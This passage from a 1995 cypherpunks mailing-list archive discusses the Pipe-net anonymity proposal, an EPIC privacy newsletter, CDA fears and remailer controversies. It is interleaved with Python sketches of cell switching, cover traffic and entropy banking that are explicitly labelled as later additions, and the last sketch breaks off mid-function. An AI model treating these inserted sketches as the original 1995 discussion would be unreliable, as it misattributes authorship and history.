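    return wire, bytes(delivered), worst


def chain_cost_cps(hops: int) -> int:
    """Bandwidth bill from the post: N links, each running at the full rate."""
    return hops * CELL_PAYLOAD * CELLS_PER_SEC


def demo():
    """Three constructed users on a 3-hop chain, 10 seconds each."""
    idle = run_chain({}, hops=3, ticks=100)
    chat = run_chain({0: b"hello", 7: b" world"}, hops=3, ticks=100)
    paste = run_chain({0: bytes(500)}, hops=3, ticks=100)
    return idle, chat, paste


if __name__ == "__main__":
    for name, (wire, out, worst) in zip(("idle", "chat", "paste"), demo()):
        print(name, len(wire), len(out), worst / CELLS_PER_SEC, "s")
```

The idle user, the chatting user and the 500-byte paste all produce the same wire trace; the paste stretches the worst delay from 3 slots to 52, so the few-seconds latency figure holds only while the offered load stays under the link rate.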




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 7 Feb 95 17:33:51 PST
To: cypherpunks@toad.com
Subject: Re: Zimmermann
In-Reply-To: <27154.792199642@dblues.engr.sgi.com>
Message-ID: <199502080133.RAA19105@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Jack Repenning <jackr@dblues.engr.sgi.com> writes:
> Has anyone yet discovered the secret reformatting necessary to
> make Phil Dubois' signature check on that message?  The usual

Got it!

	tr "\022" "\306" < thismessage | pgp26

Some bogus word processor, I'd imagine.

	Jim Gillogly
	Highday, 18 Solmath S.R. 1995, 01:33




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Tue, 7 Feb 95 16:18:29 PST
To: cypherpunks@toad.com
Subject: Effects of S.314 (Communications Decency Act)
Message-ID: <3a0ElKjqRqtP078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just had an interesting conversation with a person who works for an ISP.
Basically their response if S.314 becomes law will be to preprocess all
incoming mail. If it is uuencoded or encrypted, into the bit bucket it will
go. They are still thinking about what to do with telnet and ftp.

This is starting to get very scary.

Sam

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
                 Be careful when playing under the anvil tree.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLzgMJ8lnXxBRSgfNAQG3Egf9HewkJYboCW6RNABZiQd8K8JVyw3As0S7
Gwno4Flp3L1y/izbCSgVnrNY+oK7vwB5J0OPq4y1TX7gIb/NPasVKkcW9eET1a5X
HJwjbfg7ZbUle5dcktuD1GLC1bZu5Mt39lV8eQKjqHiXYSxc3sWJT3xvtKQ45Pr+
FWsYNALI6Q9R7sBy0Zh0vg61fZHfnlSNi7SxEvE0GZ3e959L0y+AR44UE2HrI1KQ
zfDgFtWiQsDztbVsbReYb4cwCs34Vxv/7v7GjY29SVZIKbeR1aEarR2TJbuT/jry
dP+l4QIxOFv26OIGf5cHgPiWswf1KjosUkDso0Ps8fKf3Wafm5CH2g==
=0WR8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave_Banisar.OFFICE@epic.org
Date: Tue, 7 Feb 95 15:55:42 PST
To: "CPSR  Listserv" <cpsr-announce@cpsr.org>
Subject: EPIC Alert 2.02
Message-ID: <n1419939228.95186@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


    =============================================================
      
       @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
       @     @  @   @   @        @ @   @     @     @  @    @
       @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
       @     @      @   @       @   @  @     @     @  @    @
       @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

   ==============================================================
   Volume 2.02                                   February 6, 1995
   --------------------------------------------------------------
  
                        Published by the
           Electronic Privacy Information Center (EPIC)
                         Washington, DC
                          info@epic.org

=======================================================================
Table of Contents
=======================================================================

 [1] IRS Backs Off Compliance 2000 Program
 [2] New Secrecy Order Needs Work
 [3] Caller ID Blocking Fails in New York
 [4] Post Office Partially Limits Access to Addresses
 [5] Clinton Announces National ID Registry
 [6] Correction: EU Directive Still Under Consideration
 [7] Overview of New Congressional Privacy Legislation
 [8] Upcoming Conferences and Events

=======================================================================
[1] IRS Backing Off of Compliance 2000 Program
=======================================================================

The Internal Revenue Service announced on Friday, January 20, that it
was delaying implementation of the controversial Compliance 2000 program
after heated opposition to the proposal from the Electronic Privacy
Information Center (EPIC) and other privacy advocates appeared in over
two dozen newspapers across the country.  The proposal also drew sharp
criticism from Senator David Pryor.  The plan called for IRS
collection and use of personal information from commercial databases.
This data would not be subject to the requirements of the Privacy Act.

IRS officials told the EPIC Alert that the Compliance 2000 notice
published in the Federal Register was going to be revised in the next
few weeks and then reissued.  IRS Privacy Advocate Robert Veeder said
that the notice had been drafted more than a year ago and that the
program had been revised substantially since then.

EPIC has filed a Freedom of Information Act request with the IRS,
asking for more information about the types of data that would be
collected if Compliance 2000 goes forward, the sources of the
information and the proposed uses.


=======================================================================
[2] Draft Secrecy Order Still Needs Work
=======================================================================

The White House recently circulated the latest draft of the
President's long-awaited revised Executive Order on the classification
of national security information.  The current version back-pedals on
favorable proposed reforms of the classification system, retreating
from an earlier proposal that prohibited secrecy when the "public
interest in keeping the information unclassified outweighs the need
for classification."  Such a standard would permit the public and the
news media to challenge classification decisions in court.  The draft
also fails to go far enough in opening the government's civilian
cryptographic activities to public scrutiny.

Efforts to revise the current Executive Order (issued by President
Reagan in 1982) began almost two years ago, soon after the Clinton
Administration assumed office.  Several drafts have circulated since
then, and the issuance of a final revision was anticipated more than a
year ago.  The Center for National Security Studies, the Federation of
American Scientists, the National Security Archive, and EPIC have all
urged the relaxation of classification authority.

EPIC has specifically recommended that classification be removed for
cryptographic information.  In comments submitted to the Information
Security Oversight Office in July 1993, EPIC staff urged removal of
"cryptology" from the categories of information presumed to be
classifiable.  The statement said that the "designation of a routine
privacy-enhancing technology as presumptively a national security
matter is inconsistent with the end of the Cold War and the dramatic
growth of commercial and civilian telecommunications networks.  ...
[Cryptographic] technology today plays an essential role in assuring
the security and privacy of a wide range of communications affecting
finance, education, research, and personal correspondence."

The recent Clinton proposal does indeed narrow the government's
classification authority for "cryptology", although the final order
should go further.  Under the original Reagan Order, "cryptology" was
singled out as a separate and independent category. The recent draft
drops cryptology as an independent category and instead refers
generally to "intelligence activities (including special operations),
intelligence sources or methods, or cryptology."

This formulation suggests a recognition that information concerning
encryption technology should only be classified if it relates to
intelligence uses of the technology, as opposed to the increasing use
of encryption in civilian applications.  The language, however, leaves
open the possibility that the government might still attempt to
classify information relating to cryptography.  This position does
not comport with the overwhelming opinion outside of government that
cryptography should never be presumptively classified.

The classification of cryptographic information has already hampered
the public's ability to monitor the government's activities in the
area of civilian communications security.  Information relating to the
Digital Signature Standard (intended for the authentication of
unclassified electronic transmissions) has been withheld from
disclosure under the Reagan Executive Order.  Likewise, key
information concerning the Clipper encryption initiative (including
the underlying Skipjack algorithm) has been classified and placed
beyond public review.

Congress sought to prevent such secrecy when it enacted the Computer
Security Act of 1987, which limited the civilian role of the National
Security Agency (NSA).  Congress noted that NSA's "natural tendency to
restrict and even deny access to information that it deems important
would disqualify that agency from being put in charge of the
protection of non-national security information."  The Clinton
Administration, through further revision of its draft Executive Order,
has an opportunity to build upon the openness and accountability that
Congress envisioned.


=======================================================================
[3] Caller ID Blocking Fails in New York
=======================================================================

NYNEX has admitted that the personal phone numbers of at least 30,000
of its customers who requested per-line blocking of Caller ID have
been improperly disclosed.  The problem resulted from a failure to
correctly implement the blocking feature. The New York Times reports
that NYNEX had known of the problem for at least a year before any
action was taken.

The Rhode Island Public Utilities Commission has ordered NYNEX not to
allow customers in that state to order new Caller ID services or per
line blocking until the problem is resolved.  NYNEX must also run ads
telling customers about the problem and provide an 800 number for
consumers to call.

EPIC has received several calls from individuals in New York who have
had their phone numbers disclosed.  The individuals work in sensitive
jobs and have already received threatening phone calls as a result of
the disclosures.


=======================================================================
[4] Post Office Partially Limits Access to Addresses
=======================================================================

The U.S. Postal Service announced on December 28 its final rule on
access to names and addresses.  The agency announced it was
eliminating the service that allows anyone to obtain the new address
of any individual for a $3.00 fee.  The Postal Service, however, left
intact its service that provides the addresses of all postal customers
to large mailers such as direct marketers.

The notice states "Congress has not given the Postal Service the
function of serving as a national registration point for the physical
whereabouts of individuals."

HR 434, The Postal Privacy Act of 1995, (introduced by Rep. Gary
Condit) requires that the Postal Service inform individuals of the
uses of information contained in Change of Address cards and mandates
that customers be offered an option to not have their names and
addresses forwarded.


=======================================================================
[5] Clinton Announces National ID Worker Registry
=======================================================================

In the annual State of the Union address on January 25, President
Clinton announced his support for the creation of a national registry
of all citizens and resident aliens to enforce immigration laws.  The
idea was recommended by the U.S. Commission on Immigration Reform, headed
by former Rep. Barbara Jordan.

The proposal would create a national database of all employees based
on Social Security Numbers that every employer would be required to
check before hiring.  Civil liberties groups believe that this
database, once in place, would then be used for other purposes, such
as law enforcement, and would eventually lead to the development of a
national ID card.  The Commission has previously considered requiring
the creation of an ID card but backed off in the face of public
opposition.

Senator Alan Simpson (R-WY) has introduced a bill (S. 269) to
implement the registry.  Sen. Barbara Boxer (D-CA) told USA Today that
Congress was planning to address the issue and that the system is the
only way to provide accurate citizenship information and protect
privacy.


=======================================================================
[6] Overview of New Congressional Privacy Legislation Available
=======================================================================

EPIC has produced an overview of current privacy legislation in the
104th Congress.  Bills that improve privacy protections or negatively
affect privacy are summarized.  The summary will be updated regularly
as new legislation is introduced or pending bills are revised. A
summary will appear in the next issue of the EPIC Alert.

Copies of the new bills are available for retrieval from the EPIC
Archive at cpsr.org.  Also included are floor statements on the
legislation when available and updates on the status of the bills.

To obtain the overview and copies of the House and Senate bills,
ftp/gopher/wais to cpsr.org /cpsr/privacy/epic/104th_congress_bills/


=======================================================================
[7] Upcoming Privacy Related Conferences and Events
=======================================================================

AAAS Annual Meeting & Science Innovation Expo.  Atlanta. Feb 16-21. A
special full-day session on cryptography and privacy will take place
on Tuesday, Feb. 21. Contact: Alex Fowler 202/326-7016 or
afowler@aaas.org

Cryptography: Technology, Law and Economics. New York City. Mar. 3,
1995. Sponsored by CITI, Columbia University. Contact:
citi@research.gsb.columbia.edu

Towards an Electronic Patient Record '95. Orlando, FL. Mar. 14-19,
1995. Sponsored by Medical Records Institute. Contact: 617-964-3926
(fax).

Access, Privacy, and Commercialism:  When States Gather Personal
Information. College of William and Mary, Williamsburg, VA, March 17.
Contact:  Trotter Hardy  804 221-3826.

Computers, Freedom and Privacy '95. Palo Alto, Ca. Mar. 28-31, 1995.
Sponsored by ACM. Contact: cfp95@forsythe.stanford.edu.

ETHICOMP95:  An international conference on the ethical issues of
using Information Technology. DeMontfort University, Leicester,
ENGLAND, March 28-30, 1995.  Contact: Simon Rogerson srog@dmu.ac.uk 44
533 577475 (phone)  44 533 541891 (Fax).

"Quality of Life in the Electronic Village," March 30, 1995. Live
teleconference, broadcast nationally from Virginia Tech, featuring
eminent presenters from the fields of ethics, law, education,
anthropology, medicine, and government.  Contact 703/231-6476 or
choices@vt.edu.

National Net '95: Reaching Everyone. Washington, DC.  Apr. 5-7, 1995.
Sponsored by EDUCOM.  Contact: net95@educom.edu or call 202/872-4200.

Information Security and Privacy in the Public Sector. Herndon, VA.
Apr. 19-20, 1995. Sponsored by AIC Conferences.  Contact:
212/952-1899.

1995 IEEE Symposium on Security and Privacy. Oakland, CA, May 8-10.
Contact:  sp95@itd.nrl.navy.mil.

INET '95. Honolulu, HI. June 28-30, 1995. Sponsored by the Internet
Society. Contact inet95@isoc.org.

Key Players in the Introduction of Information Technology: Their
Social Responsibility and Professional Training. July 5-6-7, 1995.
Namur, Belgium. Sponsored by CREIS. Contact: nolod@ccr.jussieu.fr.

Advanced Surveillance Technologies. Sept. 4-5, 1995. Copenhagen,
Denmark. Sponsored by Privacy International and EPIC. Contact
pi@epic.org.

          (Send calendar submissions to Alert@epic.org)
  
=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
Privacy Information Center. To subscribe, send the message:

SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname

to listserv@cpsr.org. You may also receive the Alert by reading the
USENET newsgroup comp.org.cpsr.announce.

Back issues are available via FTP/WAIS/Gopher/HTTP from cpsr.org
/cpsr/alert and on Compuserve (Go NCSA), Library 2 (EPIC/Ethics). An
HTML version of the current issue is available from
epic.digicash.com/epic

=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC.  It was established in 1994 to
focus public attention on emerging privacy issues relating to the
National Information Infrastructure, such as the Clipper Chip, the
Digital Telephony proposal, medical record privacy, and the sale of
consumer data.  EPIC is sponsored by the Fund for Constitutional
Government and Computer Professionals for Social Responsibility.  EPIC
publishes the EPIC Alert and EPIC Reports, pursues Freedom of
Information Act litigation, and conducts policy research on emerging
privacy issues.  For more information, email info@epic.org, WWW at
HTTP://epic.digicash.com/epic or write EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington, DC 20003. (202) 544-9240 (tel), (202)
547-5482 (fax).

The Fund for Constitutional Government is a non-profit organization
established in 1974 to protect civil liberties and constitutional
rights.  Computer Professionals for Social Responsibility is a
national membership organization of people concerned about the impact
of technology on society.  For information contact: cpsr-info@cpsr.org

If you'd like to support the work of the Electronic Privacy
Information Center, contributions are welcome and fully
tax-deductible.  Checks should be made out to "The Fund for
Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act
litigation, strong and effective advocacy for the right of privacy and
efforts to oppose Clipper and Digital Telephony wiretapping proposals.

------------------------ END EPIC Alert 2.02 ------------------------







_________________________________________________________________________
Subject: EPIC Alert 2.02
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 7 Feb 95 19:29:22 PST
To: weidai@eskimo.com
Subject: RE: a new way to do anonymity
Message-ID: <Chameleon.4.01.950207192939.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>This is what I wrote:

>> Imagine a server that allows you to open a 
>> low bandwidth (let's say around 100 cps, in order to reduce costs)
>> link-encrypted telnet session with it, and provides you with a number 
>> of services, for example a link-encrypted talk session with another 
>> user.  You'll need to maintain the link 24 hours a day to defend 
>> against statistical analysis, and of course you can chain a number of 
>> these servers together in a way similar to chaining remailers.

There are many, many analogies you can draw about a network of this type
to an ATM (asynchronous transfer mode) network.  By simplifying just slightly
from what you describe to only include an encrypted, switched-pipe methodology,
you now have a "cloud" type network with service entry points that are defined
by a pair of byte streams (one in each direction).

The switched path could be set up and torn down dynamically by the user by
interacting with the "switch" at each point to select the next hop the 
encrypted byte stream will follow.  Of course, just like in remailer chaining,
the data that indicates which hop to follow is encrypted with the data in a
form only the switch can decrypt.  Alternatively, once a path is set up between
switches, it can be assigned a virtual path identifier that has only local
significance at each hop, with the switch performing a lookup to forward
packets and substituting a new path number with significance at the next hop.

The above description is pretty unclear, I think, but many of these concepts 
have been fleshed out to a significant amount of detail in ATM circles.

Fixed length data packets (at the encrypted telnet level) also make it very
easy to aggregate individual circuits into higher bandwidth pipes that
connect server to server.  With these continuously running with cover traffic,
individual circuit establishment is much more immune from traffic analysis.
Cover traffic is substituted with real traffic as necessary, up to the bandwidth
of the pipe.

To summarize, what has been described is a method to establish a "network within
a network", using encrypted telnet, to provide a connection oriented, unreliable
packet switched link layer protocol.  Sounds remarkably similar to IP (except
for the connection oriented portion of it.)

What can you do with a network like this?  By layering a TCP process on top of 
this "Pipe-Net" IP like service, any of the standard TCP based application 
protocols can function between two end point systems, such as SMTP, FTP, HTTP,
etc.

What is so neat about this is that it could probably be done in user space,
and since the packet based protocol is defined as unreliable, switches could
come and go, with some sort of switch-to-switch protocol that propagates route
availability.

Eric, you could probably chew on the trust implications of all this.

Perry, I'm sure all the IPSP/SSL/SOCKS/whatever stuff you know so well could
provide a lot of building blocks for this type of thing.

Wei, your traffic analysis treatment of this sort of thing would go a long way
toward uncovering weaknesses and determining operational requirements and 
limitations.

Tim, what massive social effects would it have if this type of network service
were to become widely deployed? :)

At first glance, this Pipe-Net idea doesn't seem to take a lot of rocket science; 
it seems that most of the components or algorithms are already in use, just 
in a very different way.

I can think of a number of problems already, however.  Spamming.  Bandwidth
limitations.  Complexity of client and switch software.  Standards.  Flow
control.

In other words, all the stuff the ATM forum is already dealing with :)

Come to think of it, has anyone thought of something like this before?

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                     ftp://ftp.netcom.com/pub/jc/jcorgan/home.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
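
[Added example, not part of the original message and not code from any Pipe-net implementation: a sketch of the two mechanisms described above, per-hop virtual path identifier swapping and constant-rate pipes that fill unused slots with cover cells. The cell size, header layout, VPI values and class names are assumptions; link encryption of each cell is assumed to happen outside this sketch.]

```python
import os
import struct
from collections import deque

CELL_SIZE = 64                    # assumed size; every cell on every pipe is this long
HEADER = struct.Struct("!HB")     # virtual path id (VPI), payload length
PAYLOAD_MAX = CELL_SIZE - HEADER.size
COVER_VPI = 0                     # reserved VPI: cover traffic, dropped on receipt


def make_cell(vpi, payload=b""):
    """Pack one fixed-length cell; unused payload space gets random fill."""
    if len(payload) > PAYLOAD_MAX:
        raise ValueError("payload does not fit in one cell")
    fill = os.urandom(PAYLOAD_MAX - len(payload))
    return HEADER.pack(vpi, len(payload)) + payload + fill


def parse_cell(cell):
    """Return (vpi, payload) for a well-formed cell, else raise ValueError."""
    if len(cell) != CELL_SIZE:
        raise ValueError("cell has the wrong length")
    vpi, length = HEADER.unpack_from(cell)
    if length > PAYLOAD_MAX:
        raise ValueError("length field exceeds cell payload")
    return vpi, cell[HEADER.size:HEADER.size + length]


class Pipe:
    """One-way server-to-server link carrying exactly `rate` cells per tick."""

    def __init__(self, rate):
        self.rate = rate
        self.queue = deque()

    def enqueue(self, cell):
        self.queue.append(cell)

    def tick(self):
        """Emit this tick's cells: queued real cells first, cover for the rest."""
        return [self.queue.popleft() if self.queue else make_cell(COVER_VPI)
                for _ in range(self.rate)]


class Switch:
    """Forwards cells by table lookup, swapping the VPI for the next hop."""

    def __init__(self):
        # in_vpi -> (outbound Pipe, out_vpi); a switch with several inbound
        # pipes would key this on (inbound pipe, in_vpi) instead.
        self.routes = {}
        self.endpoints = set()    # VPIs whose circuit terminates here
        self.delivered = []

    def receive(self, cells):
        for cell in cells:
            try:
                vpi, payload = parse_cell(cell)
            except ValueError:
                continue                      # malformed cell: drop
            if vpi == COVER_VPI:
                continue                      # cover traffic: drop
            if vpi in self.endpoints:
                self.delivered.append(payload)
            elif vpi in self.routes:
                out_pipe, out_vpi = self.routes[vpi]
                out_pipe.enqueue(make_cell(out_vpi, payload))
            # unknown VPI: no circuit was set up for it, so drop


MESSAGE = b"hello over a two-hop circuit. " * 8   # constructed sample input


def run_demo(ticks=4, rate=2):
    """Send MESSAGE from A through switch B to endpoint C; report pipe contents."""
    pipe_ab, pipe_bc = Pipe(rate), Pipe(rate)
    b, c = Switch(), Switch()
    b.routes[17] = (pipe_bc, 42)   # circuit setup: VPI 17 on A->B becomes 42 on B->C
    c.endpoints.add(42)
    for i in range(0, len(MESSAGE), PAYLOAD_MAX):
        pipe_ab.enqueue(make_cell(17, MESSAGE[i:i + PAYLOAD_MAX]))
    seen = {"ab": [], "bc": []}
    for _ in range(ticks):
        cells = pipe_ab.tick()
        seen["ab"].append(cells)
        b.receive(cells)
        cells = pipe_bc.tick()
        seen["bc"].append(cells)
        c.receive(cells)
    return {
        "received": b"".join(c.delivered),
        "cells_per_tick": {k: [len(t) for t in v] for k, v in seen.items()},
        "vpis": {k: {parse_cell(x)[0] for t in v for x in t} for k, v in seen.items()},
        "sizes": {len(x) for v in seen.values() for t in v for x in t},
    }


if __name__ == "__main__":
    print(run_demo())
```

[Each pipe carries the same number of same-sized cells on every tick whether or not a circuit is active, and the identifier on A->B never appears on B->C.]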






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Tue, 7 Feb 95 16:40:39 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <3a0ElKjqRqtP078yn@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950207193831.7816I-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Feb 1995, Samuel Kaplin wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I just had an interesting conversation with a person who works for an ISP.
> Basically their response if S.314 becomes law will be to preprocess all
> incoming mail. If it is uuencoded or encrypted, into the bit bucket it will
> go. They are still thinking about what to do with telnet and ftp.

Just use netnews for mail then.  We can divide up netnews into different 
regions pgp.us.ca.north  pgp.us.ca.south etc. and then just post pgp'd 
messages to the net.  Kinda like blacknet.  Ok so there's a high cost 
involved in it, granted.

Also writing a bot to search through net news daily for anything signed 
with your PGP key isn't too difficult.

> This is starting to get very scary.

Indeed citizen-unit.  Wait over in the corner for processing.

Ben.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 7 Feb 95 11:14:35 PST
To: cypherpunks@toad.com
Subject: Re: Is the remailer crisis over?
In-Reply-To: <199502071708.JAA17106@tower.techwood.org>
Message-ID: <Pine.HPP.3.91.950207184635.26403A@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

> The remailer crisis is far from over.

And the other kind of remailer - Julf style - might possibly be
in a crisis too. One of the Horsemen (Pedo) hit Sweden in a
heavier way than ever before, yesterday. Top front page article
in a leading newspaper followed up in the evening news on a main
national TV channel. Another newspaper article today but still
beginning on the front page ('Intermediary admits to computer porno'). 
Guess who is the intermediary. Both newspaper (with big picture)
and TV interviews with Johan Helsingius (Julf), who belongs to the
minority in Finland having Swedish as their mother's tongue.
The story starts with some joker at Stockholm University, dep of
Computer Science, who has made a study of alt.binary.pictures.erotica
and has found that one percent of the material is 'nude pictures of
girls and boys 8-10 years of age' and that 'most of the child-pictures
have bounced through Johan Helsingius' computer in Helsingfors'. 
Mr Helsingius says that he is very concerned and (picture subtitle:) 
'lies awake at night'. The big fat headline on top of his picture 
says: 'This is where the kiddie porn is spreading from'. I guess
this is big "news" in Finland also, there are close media connections
between our countries. 'I don't want to reveal their addresses, only
that it concerns people in Germany and a multi-national organization
in the US' says Mr Helsingius about who are responsible for the kiddie
porn. But then he also gets a chance to talk about the benefits (abused,
political dissidents - the usual). Today's article also mentions cypherpunks
remailers (although not by name).

I don't know - this just might be yesterday's news tomorrow. Kiddie porn
per se whistle-blowing is slowly getting out of fashion here, it's only
the net connection that makes it headline news. But there is a chance
some politician will try to score on this story and, as mentioned above,
the ties on that level between Helsingfors and Stockholm are strong.
We have to wait and see.

I'm getting to think that SAFE anonymous posting will need IP spoofing,
or worse (things that I know nothing about, please correct me if I'm
totally out in the blue here).

Mats

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiego.ATTGIS.COM>
Date: Tue, 7 Feb 95 20:07:44 PST
To: entropy@intnet.net
Subject: Re: "encrypt tcp connections" hacks
Message-ID: <9502072307.aa27535@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


>> That's because the providers never package things up cleanly. If they
>> sent a client on a disk, a la AOL, and they set things up to
>> autoconfigure, they'd never need to speak to the clients.
>
>    You've obviously never attempted to get a Windows product working for 
>someone whose previous experience with a computer is limited to "Solitaire".
>
>    I've done work with this ISP, and I can tell you it's nearly the most 
>frustrating experience I've had in my life -- Windows has bizarre 
>conflicts with software eating other software, ports getting set up 
>wrong, and just general nastiness.  Even the slickest software needs 
>helpline time - for whatever reason.

   I hate jumping in when I may be completely off base but...

   NT and (possibly Windows97) may solve some of this, mainly through better
control over devices and protected memory. I recently installed some NT
services, HTTP server, and Time Service (to get time off a trusted host).
The HTTP server was installed and working in 5 minutes.  I'm a little more
advanced than the typical "Solitaire junky", but I was amazed at the ease of
install and control that some of this stuff gives you.  I would probably
spend at least 30+ minutes trying to get them properly installed on my UNIX host.
                                     ...  __o
                                    ..   `\<,
Chris.Claborne@SanDiegoCA.ATTGIS.COM...(_)/(_).            CI$: 76340.2422
---------------------------------------------------------------------------
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Available on any Pub Key server.
PGP encrypted mail welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 7 Feb 95 20:10:39 PST
To: cypherpunks@toad.com
Subject: Re: a new way to do anonymity
In-Reply-To: <199502080132.AA26151@mail.eskimo.com>
Message-ID: <199502080409.UAA22376@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Wei Dai" <weidai@eskimo.com>

   P.S. I never gave a name for the protocol... let's call it Pipe-net.

I don't think we really need a separate name for it just yet.  The
idea is composed of two pretty much independent elements: packet
forwarding and virtual link encryption.  These can be implemented
separately and then combined to yield the kind of network interaction
described.

Getting the details right will be difficult, and I'd suggest that is
where the discussion might profitably turn next.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 7 Feb 95 20:23:52 PST
To: cypherpunks@toad.com
Subject: RE: a new way to do anonymity
In-Reply-To: <Chameleon.4.01.950207192939.jcorgan@comet.aeinet.com>
Message-ID: <199502080422.UAA22395@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Johnathan Corgan <jcorgan@aeinet.com>

   There are many, many analogies you can draw about a network of this
   type to an ATM (asynchronous transfer mode) network.  

Thank you for the analogy.  It's always good not to reinvent the wheel
when you don't need to.

   The switched path could be set up and torn down dynamically by the user by
   interacting with the "switch" at each point to select the next hop the 
   encrypted byte stream will follow.

When you set up a mapping on a packet forwarder, this is exactly the
kind of initialization that would be required.  It is also at this
point that keying would be negotiated, etc.

   Fixed length data packets (at the encrypted telnet level) also make it very
   easy to aggregate individual circuits into higher bandwidth pipes that
   connect server to server.

Now here's an important detail that needs to get done right.  Is the
forwarding for fixed length packets, variable length packets, or
streams?  Is this decision global or local?  What are the latency and
aggregation effects?  How important are these for different classes
of data?  (telnet v. voice, e.g.)

I'd suggest just getting something running first, to get some
prototyping experience.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 7 Feb 95 17:48:48 PST
To: strick@techwood.com
Subject: Re: noiz-0.5: simple noise-emitting package
Message-ID: <9502080149.AA20768@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


This looks really cute, especially given the ability to "precompute"
entropy before the process that needs it is running.

An interface I'd rather see is one that allows a process to grab
random bits that it can be sure are not correlated to bits that
have been given to other processes.  Since everything runs asynchronously
with cron, you have no way of knowing how much time has elapsed since
the last time the file was read or updated, and hence don't know
how "fresh" the bits are.  Also, /etc/noiz is an attractive target
on multi-user machines....

So I'd rather see a /dev/noise, although a portable implementation
of something like that is out of the question now that there are
10 gazillion unix vendors.  Perhaps a more reasonable implementation
would be a tcp or rpc service that processes can query to get random bits,
where the server delays responding until it can guarantee that its
state is sufficiently decorrelated from previous responses.  Because you can
"bank up" entropy during idle periods, most requests could probably
be served without delay, making this technique a real advantage over
just implementing the same functions in a library called directly.
(Since good randomness is still rather expensive even when you can store it
up, and useless when sent over a network, you'd probably want the noise
server to refuse requests from outside the local machine.)

Anyway, I'm looking forward to playing with it.  It's a very nice idea.

-matt
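
[Added example, not part of the original message and not code from noiz: a sketch of the query service suggested above, which banks entropy while idle, hands every banked block to exactly one requester, makes the caller wait when the bank is empty, and refuses non-local peers. The class and function names, the 128-bit block size and the caller-supplied entropy estimates are assumptions.]

```python
import hashlib
import ipaddress
from collections import deque

BLOCK_BYTES = 16                 # each banked block is 128 bits of output
BLOCK_BITS = BLOCK_BYTES * 8


class NoiseBank:
    """Banks entropy in disjoint blocks and hands each block out exactly once."""

    def __init__(self, max_blocks=64):
        # When the bank is full, appending drops the oldest (stalest) block.
        self.bank = deque(maxlen=max_blocks)
        self._acc = hashlib.sha256()
        self._acc_bits = 0
        self._serial = 0

    def add_noise(self, sample, est_bits):
        """Mix in one noise sample; est_bits is the caller's entropy estimate."""
        self._acc.update(len(sample).to_bytes(4, "big") + sample)
        self._acc_bits += est_bits
        if self._acc_bits >= BLOCK_BITS:
            # Enough fresh input: finalise a block, then start a new accumulator
            # so the next block is built only from samples not yet used.
            self._acc.update(self._serial.to_bytes(8, "big"))
            self.bank.append(self._acc.digest()[:BLOCK_BYTES])
            self._acc = hashlib.sha256()
            self._acc_bits = 0
            self._serial += 1

    def take(self, nbytes):
        """Return nbytes of output, or None if the caller has to wait."""
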